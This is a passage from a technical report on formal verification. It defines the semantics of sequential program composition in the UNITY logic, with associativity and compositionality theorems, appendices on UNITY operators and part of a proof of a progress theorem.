such that, given a state-predicate \(r\), \(U.r\) will execute until \(r\) holds, and when \(r\) holds the value of the \(\text{pc}\) will be \(m\). Note that \(U.r\) denotes the semantics of \(U^+\). Inspecting the examples given earlier, when \(U^+\) is a simple UNITY program \(P\), this transformation returns:
\[
((\lambda r.\ \text{if } (\text{pc} = n) \land \neg r \text{ then } P \mathrel{[\,]} \text{if } (\text{pc} = n) \land r \text{ then } \text{pc} := \text{pc} + 1),\ n + 1)
\]
Now, suppose that \(U^+\) is a composite UNITY\(^+\) program \(P^+ \triangleright_r Q^+\). If transforming \(P^+\) with \(n\) as the start value of \(\text{pc}\) results in \((P, m)\), we can transform \(Q^+\) with \(m\) as the start value of \(\text{pc}\), since then we know that the first value of the \(\text{pc}\) used in the semantics of \(Q^+\) is the successor of the maximal \(\text{pc}\) used in the semantics of \(P^+\). If this transformation results in \((Q, k)\), then we can ensure that only the guards of the last “simple” UNITY program in \(P^+\)’s sequence are strengthened with the negation of the state-predicate \(r\), by defining the transformation of \(P^+ \triangleright_r Q^+\) with \(n\) as the start value of \(\text{pc}\) to result in:
\[
((\lambda q. (P.r \| Q.q)), k)
\]
The formal definition of this transformation function is stated below. We use restricted union superposition (Definition A.21) to transform Simple UNITY+ programs.
Definition 2.3
\[
\begin{align*}
\text{tr}.(\text{Simple}.P).\text{pc}.n &= ((\lambda r.\ \text{RUS}.(\text{strengthen\_guards}.((\text{pc} = n) \land \neg r).P) \\
&\qquad\qquad .(\text{if } (\text{pc} = n) \land r \text{ then } \text{pc} := \text{pc} + 1) \\
&\qquad\qquad .\text{true}),\ n + 1) \\
\text{tr}.(P^+ \triangleright_r Q^+).\text{pc}.n &= \text{let } (P, m) = \text{tr}.P^+.\text{pc}.n \text{ and } (Q, k) = \text{tr}.Q^+.\text{pc}.m \\
&\qquad \text{in } ((\lambda q.\ P.r \parallel Q.q),\ k)
\end{align*}
\]
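The essential bookkeeping in \(\text{tr}\) is the threading of the \(\text{pc}\) start value through the recursion. The following sketch (ours) models only that numbering, and shows that both groupings of \(P \triangleright_r Q \triangleright_s H\) assign the same \(\text{pc}\) values to the simple programs, which is the core of the associativity argument:

```python
# A UNITY+ program is modelled as either a name (a simple program) or a
# triple (left, r, right) standing for left ▷_r right.  tr returns the list
# of pc values assigned to the simple programs, plus the next free pc value.

def tr(u, n):
    if isinstance(u, str):        # Simple program: occupies pc value n
        return [(u, n)], n + 1
    left, _r, right = u
    ldesc, m = tr(left, n)        # left component uses pc values n .. m-1
    rdesc, k = tr(right, m)       # right component starts at m, as Definition 2.3 requires
    return ldesc + rdesc, k

# P ▷_r Q ▷_s H, grouped either way, yields the same numbering:
print(tr((("P", "r", "Q"), "s", "H"), 0))  # ([('P', 0), ('Q', 1), ('H', 2)], 3)
print(tr(("P", "r", ("Q", "s", "H")), 0))  # same result
```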
Now the semantics of a UNITY\(^+\) program is defined by the following function:
Definition 2.4
\[
\text{semantics}.U^+.\text{pc}.n.q = \text{add\_to\_initial\_cond}.(\text{pc} = n).(\text{FST}.(\text{tr}.U^+.\text{pc}.n).q)
\]
where \( n \) is the start value of the \( \text{pc} \), and \( q \) is a state-predicate indicating when the last simple program in the composition is allowed to stop executing (i.e. its exit condition). If \( q \) is false, this indicates that the actions of the last simple UNITY program in a sequential composition may be enabled indefinitely and that the \( \text{pc} \) will not be incremented anymore. Note that using this definition, the semantics of \( P \triangleright_r Q \triangleright_s H \) is slightly different from that presented on page 3. More specifically, \( \text{semantics}.(P \triangleright_r Q \triangleright_s H).\text{pc}.0.\text{false} \) results in the UNITY program depicted in Figure 2. However, it is easily recognised that the semantics are the same, since \( \text{true} \) is the identity element of \( \land \), and the last action will always be a skip action because \( \text{false} \) is never satisfied.
Proving that \( \triangleright_r \) is associative is now straightforward, since parallel composition \( (\parallel) \) is associative:
\[ \text{Theorem 2.5 Associativity of } \triangleright_r \]
For arbitrary UNITY\(^+\) programs \( P^+, Q^+, \) and \( H^+, \) and state-predicates \( r, s \in \text{Expr} \):
\[ \text{semantics}.((P^+ \triangleright_r Q^+) \triangleright_s H^+) = \text{semantics}.(P^+ \triangleright_r (Q^+ \triangleright_s H^+)) \]
Consequently, the function \( \text{semantics}.U^+.\text{pc} \) only defines the desired semantics for \( U^+ \) when \( pc \) does not occur in \( U^+ \).
We end this section by stating some properties of the semantics of \( \triangleright_r \). The maximal value the \( \text{pc} \) can reach in the program \( \text{semantics}.U^+.\text{pc}.n.q \) is defined by:
\[ \text{Definition 2.7} \]
\[ \text{max}_{\text{pc}}.U^+.\text{pc}.n = \text{SND}.(\text{tr}.U^+.\text{pc}.n) \]
From the definition of $\text{tr}$ (2.3), it is straightforward to deduce:
**Theorem 2.8**
\[ \forall U^+\ pc\ n :: n < \text{max}_{\text{pc}}.U^+.pc.n \]
When the value of the $\text{pc}$ is less than $n$, or greater than or equal to $\text{max}_{\text{pc}}.U^+.\text{pc}.n$, all actions in the program $\text{semantics}.U^+.\text{pc}.n.q$ (for arbitrary $q$) are disabled. Consequently, such states are fixed-points of this program:
**Theorem 2.9**
\[ \forall U^+\ pc\ n\ q :: U = \text{semantics}.U^+.pc.n.q \land \{pc\} \not\in U^+ \;\Rightarrow\; U \vdash \text{fp}.(pc < n) \;\land\; U \vdash \text{fp}.(pc \geq \text{max}_{\text{pc}}.U^+.pc.n) \]
The value of the $\text{pc}$ never decreases during the execution of $\text{semantics}.U^+.\text{pc}.n.q$ (for arbitrary $q$), so:
**Theorem 2.10**
\[ \forall U^+\ pc\ n\ q\ k :: U = \text{semantics}.U^+.pc.n.q \land \{pc\} \not\in U^+ \;\Rightarrow\; U \vdash (pc = k) \text{ unless } (pc > k) \]
Finally, during the execution of $\text{semantics}.U^+.\text{pc}.n.q$ (for arbitrary $q$), the value of the $\text{pc}$ stays below $\text{max}_{\text{pc}}.U^+.\text{pc}.n$ until $q$ holds and the $\text{pc}$ is incremented to its maximum value:
**Theorem 2.11**
\[ \forall U^+\ pc\ n\ q :: U = \text{semantics}.U^+.pc.n.q \land \{pc\} \not\in U^+ \land pc \not\in q \;\Rightarrow\; U \vdash (pc < \text{max}_{\text{pc}}.U^+.pc.n) \text{ unless } ((pc = \text{max}_{\text{pc}}.U^+.pc.n) \land q) \]
### 3 Proving properties of program sequencing
When working with $\text{UNITY}^+$ programs, the semantics underlying the $\triangleright$ operator should be hidden, and the user should be able to prove properties of sequentially composed programs by proving properties of their component programs. In order to establish this, we first define safety and progress operators for $\text{UNITY}^+$ programs in terms of the standard safety and progress operators for UNITY programs. Subsequently we derive theorems that state how safety and progress properties of $\text{UNITY}^+$ programs can be proved by reducing them to standard UNITY properties of the component programs.
To express safety properties of $\text{UNITY}^+$ programs, we introduce two operators $\text{unless}^+$ and $\bigcirc^+$. Since the semantics of a $\text{UNITY}^+$ program requires a state-predicate that indicates the
Theorem 3.3
\[\frac{P \vdash p \text{ unless } q \qquad (pc \text{ occurring in neither } \text{Simple}.P \text{ nor } p)}{\forall r :: \text{Simple}.P \vdash p \text{ unless}^+_r\, q}\]
Theorem 3.4
\[\frac{q\,\mathsf{C}\,\text{w}.P^+ \;\land\; P^+ \vdash p \text{ unless}^+_q\, s \;\land\; Q^+ \vdash p \text{ unless}^+_r\, s}{(P^+ \triangleright_q Q^+) \vdash p \text{ unless}^+_r\, s}\]
Figure 3: Proving safety for UNITY\(^+\) programs
Definition 3.1
\[U^+ \vdash p \text{ unless}^+_r\, q \;=\; \forall pc\ n\ U : \{pc\} \not\in U^+ \land U = \text{semantics}.U^+.pc.n.r : U \vdash p \text{ unless } q\]
Definition 3.2
\[U^+ \vdash \bigcirc^+_r\, J \;=\; \forall pc\ n\ U : \{pc\} \not\in U^+ \land U = \text{semantics}.U^+.pc.n.r : U \vdash \bigcirc\, J\]
Compositionality theorems of unless\(^+\) are stated in Figure 3. Similar properties hold for the \(\bigcirc^+\) operator.
To express progress properties of UNITY\(^+\) programs, we introduce two operators \(\rightarrow^+\) and \(\mapsto^+\). Again, intuitively, for a UNITY\(^+\) program \(U^+\), \(U^+ \vdash p \rightarrow^+ q\) shall imply that, during the execution of the semantics of \(U^+\), when \(p\) holds then eventually \(q\) holds. However, we have to be more specific about what we mean here. Consider again the following sequential composition:
\[U^+ = P \triangleright_r Q \triangleright_s H\]
Suppose we are at a specific point in the execution of the semantics of \(U^+\) where the \(pc\) is such that it is \(P\)’s turn to execute and \(p\) holds. Now, do we want \(U^+ \vdash p \rightarrow^+ q\) to be valid if, from this specific point, eventually \(q\) holds in \(P\) while actions of \(Q\) and \(H\) have not yet been executed? In order to answer this question, we have to consider what we are aiming at. As previously indicated, we want to derive theorems stating how progress properties of UNITY\(^+\) programs can be proved by reducing them to standard UNITY properties of the component programs. More specifically, for the case of \(U^+\) above, these theorems shall state something like:
\[P^+ \vdash p \rightarrow^+ q \;\land\; Q^+ \vdash q \rightarrow^+ s \;\Rightarrow\; (P^+ \triangleright_q Q^+) \vdash p \rightarrow^+ s\]
Suppose we know that:
\[ H \vdash (x = 10) \rightarrow^+ \textit{something beautiful} \]
Let \( P \) and \( Q \) be the following programs:
\[
\begin{align*}
\text{prog } P & \quad \text{prog } Q \\
\text{read } \emptyset & \quad \text{read } \emptyset \\
\text{write } \{x\} & \quad \text{write } \{x\} \\
\text{init } \text{some initial condition} & \quad \text{init } (x = 9) \\
\text{assign } x := 10 & \quad \text{assign } x := 10
\end{align*}
\]
Moreover, for the sake of the argument, suppose that the answer to the previous question would be yes, and that we define:
\[ U^+ \vdash p \rightarrow^+ q \;=\; \forall pc\ n\ U : \{pc\} \not\in U^+ \land U = \text{semantics}.U^+.pc.n.q : U \vdash p \rightarrow q \]
Therefore, we would be able to prove that:
\[ P \triangleright_{(x = 9)} Q \vdash \textit{some initial condition} \rightarrow^+ (x = 10) \]
However, since \( x \) will never be 9, the \( pc \) in the semantics of \( P \triangleright_{(x = 9)} Q \) will never be incremented, and consequently, we cannot prove that
\[ P \triangleright_{(x = 9)} Q \triangleright_{(x = 10)} H \vdash \textit{some initial condition} \rightarrow^+ \textit{something beautiful} \]
since \( H \) will never get a chance to execute. Thus, defining \( \rightarrow^+ \) in this way does not enable us to prove the theorems we are aiming at, and the answer to the question posed above is no. From this discussion we can derive that we only want \( U^+ \vdash p \rightarrow^+ q \) to be valid if \( q \) eventually holds during the execution of the last program in the \( \triangleright \)-sequence \( U^+ \). This can be established by letting \( q \) be the exit condition of the last program in the \( \triangleright \)-sequence \( U^+ \), and requiring that the value of the \( pc \) in the semantics of this sequence eventually reaches its maximum value. Consequently, progress properties for UNITY\(^+\) programs are defined as follows:
**Definition 3.5**
\[ J_{U^+} \vdash p \rightarrowtail^+ q \;=\; \forall pc\ n\ m\ U : \{pc\} \mathrel{\triangleleft} U^+ \land U = \text{semantics}.U^+.pc.n.q \land m = \text{max\_pc}.U^+.pc.n : J_U \vdash (p \land (pc = n)) \rightarrowtail (pc = m) \]
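For instance, for a singleton sequence \(\text{Simple}.P\) the maximum \(pc\) value is \(n + 1\) (cf. assumption \(\text{A}_9\) in the proof of Theorem 3.7), so for that special case the definition specialises to requiring

\[ J_U \vdash (p \land (pc = n)) \rightarrowtail (pc = n + 1) \]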
**Definition 3.6**
\[ J_{U^+} \vdash p \leadsto^+ q \;=\; \forall pc\ n\ m\ U : \{pc\} \mathrel{\triangleleft} U^+ \land U = \text{semantics}.U^+.pc.n.q \land m = \text{max\_pc}.U^+.pc.n : J_U \vdash (p \land (pc = n)) \leadsto (pc = m) \]
Compositionality theorems for \( \rightarrowtail^+ \) are presented below. For \( \leadsto^+ \) similar properties hold.
4 Concluding remarks
In this technical report we have presented a formalisation of sequential program composition in UNITY. We have been brief and have not described any application of the developed theory in detail. We think we have obtained a nice formalisation of the semantics of sequential composition. Once the transformation function (tr) was defined, the definitions of the safety and progress operators followed naturally, and the compositionality results were proved smoothly. Moreover, we find that the formalisation illustrates the possibly unexpected complications that can appear when formally defining allegedly simple concepts (like sequential composition) whose definition and properties are intuitively clear.
Theorem 3.7
\[ \frac{J_P \vdash p \rightarrowtail q \;\land\; (\forall pc : \{pc\} \mathrel{\triangleleft} \text{Simple}.P : J \mathcal{C} \{pc\}^c)}{J_{\text{Simple}.P} \vdash p \rightarrowtail^+ q} \]
Theorem 3.8
\[ \frac{q \mathcal{C} wP \;\land\; J_P \vdash p \rightarrowtail^+ q \;\land\; J_Q \vdash q \rightarrowtail^+ s}{J_{P \,;_q\, Q} \vdash p \rightarrowtail^+ s} \]
Appendices
A UNITY
In this section we shall give an overview of the UNITY theory and Prasetya’s extensions. We shall concentrate on those concepts that are needed in the rest of this report. For a more thorough treatment the reader is referred to [CM89, Pra95, Vos00].
A.1 Variables, values, states, expressions and actions
The state of a program is represented as a function from a universe $\mathit{Var}$ of all program variables to a universe $\mathit{Val}$ of all values these variables may take. The set of all program states will be denoted by $\mathit{State}$.
A state-expression is a function of type $\mathit{State} \rightarrow \alpha$, where $\alpha$ is an arbitrary type. The set of all state-expressions will be denoted by $\mathit{Expr}$.
A state-predicate is a state-expression where type $\alpha$ is $\mathit{bool}$.
A state-expression $f$ is confined by a set of variables $V$, denoted by $f \mathcal{C} V$, if the value of $f$ does not depend on any variable outside $V$:
Definition A.1 STATE-EXPRESSION CONFINEMENT \[ CONF.DEF \]
For all $f \in (\sigma_1 \rightarrow \sigma_2) \rightarrow \alpha$, and $V \subseteq \sigma_1$,
\[
\begin{align*}
f \mathcal{C} V &= (\forall s, t :: (s \upharpoonright V = t \upharpoonright V) \implies (f.s = f.t))
\end{align*}
\]
The confinement operator is monotonic in its second argument.
Theorem A.2 \[ CONF.MONO \]
$V \subseteq W \land (f \mathcal{C} V) \implies (f \mathcal{C} W)$
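As a small illustrative instance (not taken from the source): take the state-expression $f$ with $f.s = s.x$. Then $f \mathcal{C} \{x\}$, since any two states that agree on $x$ yield the same value of $f$, and by Theorem A.2 also $f \mathcal{C} \{x, y\}$ for any further variable $y$:

\[ (s \upharpoonright \{x\} = t \upharpoonright \{x\}) \implies (f.s = f.t) \]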
The actions of a UNITY program can be multiple assignments or guarded multiple assignments. The universe of actions will be denoted by $\mathit{ACTION}$.
A set of variables $V$ is ignored-by an action $A$, denoted by $V \leftarrow A$, if executing $A$ in any state does not change the values of these variables. Variables in $V \subseteq \mathit{Var}$ may, however, be written by $A$.
A.2 UNITY programs
A UNITY program consists of declarations of read variables, write variables, a specification of their initial values, and a set of actions.
An execution of a UNITY program starts in a state satisfying the initial condition and is an infinite and interleaved execution of its actions. In each step of the execution some action is selected and executed atomically. The selection of actions is weakly fair, i.e. non-deterministic selection constrained by the following fairness rule:
\[
\text{Each action is scheduled for execution infinitely often, and hence cannot be ignored forever.}
\]
A UNITY program $P$ is modelled by a quadruple $(A, J, V_r, V_w)$ where $A \subseteq \mathit{ACTION}$ is a set consisting of $P$’s actions, $J \in \mathit{Expr}$ is a state-predicate describing the possible initial states of $P$, and $V_r, V_w \subseteq \mathit{Var}$ are sets containing $P$’s read and write variables respectively. The set of all possible quadruples $(A, J, V_r, V_w)$ shall be denoted by $\mathit{Uprog}$. To access each component of
such an $\text{Uprog}$ object, the destructors $a$, $\text{ini}$, $r$, and $w$ are introduced. They satisfy the following property:
Theorem A.3 $\text{Uprog}$ Destructors
$$P \in \text{Uprog} = (P = (aP, \text{ini}P, rP, wP))$$
The operators on actions can now be lifted to the program level as follows:
Definition A.4 VARIABLES IGNORED-BY Program $\text{dIG}_\text{BY}_\text{Pr}$
$$V \leftarrow P \equiv \forall a : a \in aP : V \leftarrow a$$
Due to the absence of ordering in the execution of a UNITY program, parallel composition of two programs can be modelled by simply merging the variables and actions of both programs. In UNITY parallel composition is denoted by $[]$. In [CM89] the operator is also called program union.
Definition A.5 PARALLEL COMPOSITION $\text{dPAR}$
$$P [] Q = (aP \cup aQ, \text{ini}P \land \text{ini}Q, rP \cup rQ, wP \cup wQ)$$
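As an illustrative instance (not from the source): composing $P = (\{x := 1\},\; x = 0,\; \{x\},\; \{x\})$ and $Q = (\{y := 2\},\; y = 0,\; \{y\},\; \{y\})$ simply merges the components:

\[ P \mathbin{[]} Q = (\{x := 1,\; y := 2\},\; (x = 0) \land (y = 0),\; \{x, y\},\; \{x, y\}) \]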
Parallel composition is reflexive, commutative, associative, and has the identity element ($\emptyset$, true, $\emptyset$, $\emptyset$). We can strengthen the initial condition of a UNITY program using the following function:
Definition A.6 STRENGTHEN THE initial condition $\text{add}_\text{to}_\text{initial}_\text{cond}$
$$\text{add}_\text{to}_\text{initial}_\text{cond}.I.P = (aP, \text{ini}P \land I, rP, wP)$$
A.3 UNITY specification and proof logic
UNITY logic is used to specify the correctness expectations or properties of a UNITY program. UNITY specifications, and program properties are built from state-predicates and relations on them. Traditionally, two kinds of program properties are distinguished:
- Safety properties stating that some undesirable behaviour does not occur;
- Progress properties stating that some desirable behaviour is eventually realised.
Consequently, the UNITY logic contains two basic relations on state-predicates corresponding to these properties. For a UNITY program $P$ and state-predicates $p, q \in \text{Expr}$, these are defined by:
Definition A.7 UNLESS (Safety Property) $\text{UNLESS}_e$
$$P \vdash p \text{ unless } q \;=\; (\forall a : a \in aP : \{p \land \neg q\}\; a\; \{p \lor q\})$$
Definition A.8 ENSURES (Progress Property) $\text{ENSURES}_e$
$$P \vdash p \text{ ensures } q \;=\; (P \vdash p \text{ unless } q) \land (\exists a : a \in aP : \{p \land \neg q\}\; a\; \{q\})$$
Safety properties are described by the unless relation (Definition A.7). Intuitively, $P \vdash p \text{ unless } q$ implies that once $p$ holds during an execution of $P$, it continues to hold at least until $q$ holds. Note that this interpretation gives no information whatsoever about what $p \text{ unless } q$ means if $p$ never holds during an execution.
Progress properties are described by the ensures relation. As can be seen from Definition A.8, \( P \vdash p \text{ ensures } q \) encompasses \( p \) unless \( q \). Furthermore, it guarantees that there exists an action that can – and, as a result of the weakly fair execution of UNITY programs, will – establish \( q \).
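As an illustrative instance (not from the source): consider a program \( P \) whose only action is \( x := x + 1 \). Then

\[ P \vdash (x = 0) \text{ unless } (x = 1), \]

since the Hoare triple \( \{(x = 0) \land \neg(x = 1)\}\; x := x + 1\; \{(x = 0) \lor (x = 1)\} \) holds, and moreover \( P \vdash (x = 0) \text{ ensures } (x = 1) \), because this same action establishes \( x = 1 \) from every state where \( x = 0 \).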
A state-predicate \( p \) is a stable predicate in program \( P \) if, once \( p \) holds during any execution of \( P \), it continues to hold forever.
**Definition A.9 Stable Predicate**
\[ P \vdash \circ p \;=\; P \vdash p \text{ unless false} \]
A state-predicate \( p \) is a fixed-point of program \( P \) if, once predicate \( p \) holds during the execution of \( P \), the program can no longer change the state. In other words, once \( p \) holds during the execution of \( P \), the program will subsequently behave as skip. If \( p \) is a fixed point of program \( P \) we denote this by \( P \vdash \text{FP}.p \).
To specify general progress properties in UNITY, the leads-to operator is used. It is denoted by \( \mapsto \), and defined as the smallest transitive and disjunctive closure of ensures. The precise definition and properties of \( \mapsto \) can be found in [CM89]. In this technical report, we shall use Prasetya’s [Pra95] variant of \( \mapsto \) to specify progress properties. Prasetya’s operator, called reach, is denoted by \( \rightarrowtail \), and is defined (without overloading) as follows:
**Definition A.10 Reach Operator**
\((\lambda p, q.\; J_P \vdash p \rightarrowtail q)\) is defined as the smallest relation \( R \) satisfying:
\[
\begin{align*}
(i). & \quad p \mathcal{C} wP \land q \mathcal{C} wP \land (P \vdash \circ J) \land (P \vdash J \land p \text{ ensures } q) \;\Rightarrow\; R.p.q \\
(ii). & \quad R.p.q \land R.q.r \;\Rightarrow\; R.p.r \\
(iii). & \quad (\forall i : W.i : R.(p_i).q) \;\Rightarrow\; R.(\exists i : W.i : p_i).q
\end{align*}
\]
where \( W \) characterises a non-empty set.
Intuitively, \( J_P \vdash p \rightarrowtail q \) means that \( J \) is a stable predicate in \( P \) and that \( P \) can progress from \( J \land p \) to \( q \). Note that:
- \( p \mapsto q \) describes progress made through the writable part of program \( P \) (viz. \( p \) and \( q \) are confined by the write variables of \( P \)). However, since a program can only make progress on its write variables, this should not be a hindrance [Pra95].
- the predicate \( J \) can be used to specify the non-writable part of the program, e.g. assumptions on the environment in which the program operates.
Some properties of the UNITY operators can be found in Figure 4.
In [Pra95], Prasetya also introduces an operator to specify the more restricted form of self-stabilisation, called convergence, that allows a program to recover only from certain failures. The convergence operator is denoted by \( \rightsquigarrow \) and defined in terms of \( \mapsto \) as follows:
**Definition A.18 Convergence**
\[ J_P \vdash p \rightsquigarrow q \;=\; q \mathcal{C} wP \land (\exists q' :: (J_P \vdash p \rightarrowtail (q' \land q)) \land (P \vdash \circ (J \land q' \land q))) \]
A program \( P \) converges from \( p \) to \( q \) under the stability of \( J \) (i.e. \( J_P \vdash p \rightsquigarrow q \)) if, given that \( P \vdash \circ J \), the program \( P \) started in \( p \) will eventually find itself in a situation where \( q \) holds and continues to hold. Intuitively, a program \( P \) for which this holds can recover from failures which
Theorem A.11 \textit{unless Compositionality}
\[(P \vdash p \text{ unless } q) \land (Q \vdash p \text{ unless } q) \;=\; (P \mathbin{[]} Q \vdash p \text{ unless } q)\]
Theorem A.12
\[(V \leftarrow P) \land (p \mathcal{C} V) \;\Rightarrow\; P \vdash \circ p\]
Theorem A.13 \textit{\(\rightarrowtail\) Introduction}
\[ p \mathcal{C} wP \land q \mathcal{C} wP \land (P \vdash \circ J) \land (P \vdash J \land p \text{ ensures } q) \;\Rightarrow\; J_P \vdash p \rightarrowtail q \]
Theorem A.14 \textit{\(\rightarrowtail\) Transitivity}
\[ (J_P \vdash p \rightarrowtail q) \land (J_P \vdash q \rightarrowtail r) \;\Rightarrow\; J_P \vdash p \rightarrowtail r \]
Theorem A.15 \textit{Par Skip Imp Reach}
\[ (J_P \vdash p \rightarrowtail q) \land (Q \vdash \text{FP}.(\neg q)) \land (Q \vdash \circ J) \;\Rightarrow\; J_{P \mathbin{[]} Q} \vdash p \rightarrowtail q \]
Theorem A.16 \textit{Par Skip Imp Reach}
Theorem A.17 \textit{Par Skip Imp Reach}
\[\text{Figure 4: Some properties of the UNITY operators.}\]
Most properties of \( \rightsquigarrow \) are analogous to those of \( \rightarrowtail \). Since, in this technical report, we do not need these theorems directly, the reader is referred to [Pra95] for their exact characterisation.
A.4 Restricted union superposition
In [CM89], the \textit{restricted union superposition} rule states that an action \(A\) may be added to an underlying program provided that \(A\) does not assign to the underlying variables. Here we split this into two parts: (1) defining the actual transformation of the program; (2) proving under which conditions this transformation preserves the properties of the underlying program.
Let \(A\) be an action from the universe \textit{ACTION}, and let \(iA\) be a state-predicate describing the initial values of the superposed variables, then a program \(P\) can be refined by restricted union superposition using the transformation formally defined by:
\textbf{Definition A.21 Restricted union superposition}
\[\text{RU superpose DEF}\]
Let \(A \in \text{ACTION}, iA \in \text{Expr}, \text{ and } P \in \text{Uprog.}\]
\[\text{RU.S}.P.A.iA \;=\; P \mathbin{[]} (\{A\},\; iA,\; \text{assign\_vars}.A,\; \text{assign\_vars}.A)\]
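As an illustrative instance (not from the source): superposing the action \( A = (c := c + 1) \) with initial condition \( iA = (c = 0) \) onto a program \( P \) that does not mention the fresh variable \( c \) yields

\[ \text{RU.S}.P.A.iA = P \mathbin{[]} (\{c := c + 1\},\; c = 0,\; \{c\},\; \{c\}), \]

and since \( wP \leftarrow A \), the theorems of Figure 5 guarantee that the (suitably confined) properties of \( P \) are preserved.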
Let $P \in \text{Uprog}$, $A \in \text{ACTION}$, and $p, q, J \in \text{Expr}$.
**Theorem A.19**
**Preservation of** unless **and** ensures
\[ p \mathcal{C} wP \land q \mathcal{C} wP \land (wP \leftarrow A) \land (P \vdash p \text{ unless } q) \;\Rightarrow\; \text{RU.S}.P.A.iA \vdash p \text{ unless } q \]
\[ p \mathcal{C} wP \land q \mathcal{C} wP \land (wP \leftarrow A) \land (P \vdash p \text{ ensures } q) \;\Rightarrow\; \text{RU.S}.P.A.iA \vdash p \text{ ensures } q \]
**Theorem A.20**
**Preservation of** \( \rightarrowtail \) **and** \( \rightsquigarrow \)
\[ J \mathcal{C} wP \land (wP \leftarrow A) \land (J_P \vdash p \rightarrowtail q) \;\Rightarrow\; J_{\text{RU.S}.P.A.iA} \vdash p \rightarrowtail q \]
\[ J \mathcal{C} wP \land (wP \leftarrow A) \land (J_P \vdash p \rightsquigarrow q) \;\Rightarrow\; J_{\text{RU.S}.P.A.iA} \vdash p \rightsquigarrow q \]
**Theorem A.22**
**Strengthen Guard Symmetry**
\[ \text{strengthen\_guards}.(g_1 \land g_2).P = \text{strengthen\_guards}.g_1.(\text{strengthen\_guards}.g_2.P) \]
**Theorem A.23**
**Preservation of** \( \rightarrowtail \)
\[ g \mathcal{C} wP \land (J \land \neg q \Rightarrow g) \land (J_P \vdash p \rightarrowtail q) \;\Rightarrow\; J_{\text{strengthen\_guards}.g.P} \vdash p \rightarrowtail q \]
**Theorem A.24**
**Strengthen guards with stable predicate preserves** \( \rightarrowtail \)
\[ g \mathcal{C} wP \land (P \vdash \circ g) \land (J_P \vdash p \rightarrowtail q) \;\Rightarrow\; J_{\text{strengthen\_guards}.g.P} \vdash (p \land g) \rightarrowtail (q \land g) \]
**Figure 5:** Restricted union superposition preserves properties
**Figure 6:** Properties of strengthening program guards
The function assign_vars, given an action $A$, returns the set of variables that are assigned by this action. Theorems stating that properties are preserved under restricted union superposition are listed in Figure 5. Note that instead of requiring that the superposed action $A$ does not write to the underlying variables, it is sufficient to require that the write variables of the underlying program are ignored by the action $A$.
### A.5 Strengthening guards
Another program transformation that preserves safety properties and, under some conditions, progress properties of the underlying program is that of strengthening guards [Sin89b, Mis90a]. Below, we define the transformation for the case where all guards of the program are strengthened with the same guard.
Some properties of this transformation are listed in Figure 6 below.
B Proofs of the \( \rightarrowtail^+ \)-compositionality theorems
In this section we shall briefly discuss the verification of the compositionality theorems. Theorems 3.3 in Figure 3 can be proved using Restricted Union unless Preservation A.19. Theorems 3.4 in Figure 3 can be proved using unless Compositionality A.11. The verification of the theorems 3.7 and 3.8 will be described in the sections below.
B.1 Proof of Theorem 3.7
Assume the following:
\( \text{A}_1: J_P \vdash p \rightarrowtail q \)
\( \text{A}_2: \forall pc: \{pc\} \mathrel{\triangleleft} (\text{Simple}.P): J \mathcal{C} \{pc\}^c \)
we have to prove that: \( J_{\text{Simple}.P} \vdash p \rightarrowtail^+ q \).
using Definition 3.5 this comes down to proving that:
\( \forall pc\ n\ m\ U: \{pc\} \mathrel{\triangleleft} (\text{Simple}.P) \)
\( \land\ U = \text{semantics}.(\text{Simple}.P).pc.n.q \)
\( \land\ m = \text{max\_pc}.(\text{Simple}.P).pc.n \)
\( \Rightarrow \)
\( J_U \vdash (p \land (pc = n)) \rightarrowtail (pc = m) \)
Assuming:
\( \text{A}_3: \{pc\} \mathrel{\triangleleft} (\text{Simple}.P) \)
\( \text{A}_4: U = \text{semantics}.(\text{Simple}.P).pc.n.q \)
\( \text{A}_5: m = \text{max\_pc}.(\text{Simple}.P).pc.n \)
we have to prove that: \( J_U \vdash (p \land (pc = n)) \rightarrowtail (pc = m) \)
rewriting \( \text{A}_4 \) with Definitions A.21, 2.3 and 2.4 we can deduce:
\( \text{A}_6: U = U_P \mathbin{[]} U_{pc} \), such that
\( \text{A}_7: U_P = \text{strengthen\_guards}.(pc = n \land \neg q).(aP,\ \text{ini}P \land (pc = n),\ rP \cup \{pc\},\ wP \cup \{pc\}) \)
\( \text{A}_8: U_{pc} = (\{\text{if } (pc = n \land q) \text{ then } pc := pc + 1\},\ (pc = n),\ \{pc\},\ \{pc\}) \)
\( \text{A}_9: m = (n + 1) \)
Now we have to prove that: \( J_{U_P \mathbin{[]} U_{pc}} \vdash (p \land pc = n) \rightarrowtail (pc = n + 1) \)
\( \Leftarrow (\rightarrowtail \text{ Transitivity } (\text{A.14}_{13})) \)
\( J_{U_P \mathbin{[]} U_{pc}} \vdash (p \land pc = n) \rightarrowtail (q \land pc = n) \)
\( \land \)
\( J_{U_P \mathbin{[]} U_{pc}} \vdash (q \land pc = n) \rightarrowtail (pc = n + 1) \)
The second conjunct can be proved by \( \rightarrowtail \) Introduction (A.13\(_{13}\)), since \( U_{pc} \) (from \( \text{A}_8 \)) ensures the required progress.
The first conjunct is decomposed as follows:
\( \Leftarrow (\text{Theorem A.15}_{13}) \)
\( J_{U_P} \vdash (p \land pc = n) \rightarrowtail (q \land pc = n) \)
\( \land \)
\( U_{pc} \vdash \text{FP}.(\neg (q \land pc = n)) \)
\( \land \)
\( U_{pc} \vdash \circ J \)
Since the guard of the only action of program $U_{pc}$ (from $\text{A}_8$) is $(pc = n \land q)$, it is not hard to see that $\neg (q \land pc = n)$ is a fixed point of $U_{pc}$.
Using assumptions \( \text{A}_2 \) and \( \text{A}_3 \), we can infer that \( J \) does not depend on the variable \( pc \) (i.e. \( J \mathcal{C} \{pc\}^c \)). Moreover, since \( U_{pc} \) only writes to the variable \( pc \), it is straightforward to prove that \( U_{pc} \) ignores all other variables (i.e. \( \{pc\}^c \leftarrow U_{pc} \)). Consequently, we can use Theorem A.12\(_{13}\) to prove that \( J \) is stable in \( U_{pc} \).
Consequently, we are left with the proof obligation: \( J_{U_P} \vdash (p \land pc = n) \rightarrowtail (q \land pc = n) \)
Using A.22\(_{14}\), we can rewrite assumption \( \text{A}_7 \) into
\( U_P = \text{strengthen\_guards}.(pc = n).U'_P \), where
\( U'_P = \text{strengthen\_guards}.(\neg q).(aP,\ \text{ini}P \land (pc = n),\ rP \cup \{pc\},\ wP \cup \{pc\}) \)
now we proceed as follows:
\( J_{U_P} \vdash (p \land pc = n) \rightarrowtail (q \land pc = n) \)
\( \Leftarrow (\text{Theorem Strengthen guards with stable predicate A.24}_{14}) \)
\( J_{U'_P} \vdash p \rightarrowtail q \)
\( \land \)
\( (pc = n) \mathcal{C}\ wU'_P \)
\( \land \)
\( U'_P \vdash \circ (pc = n) \)
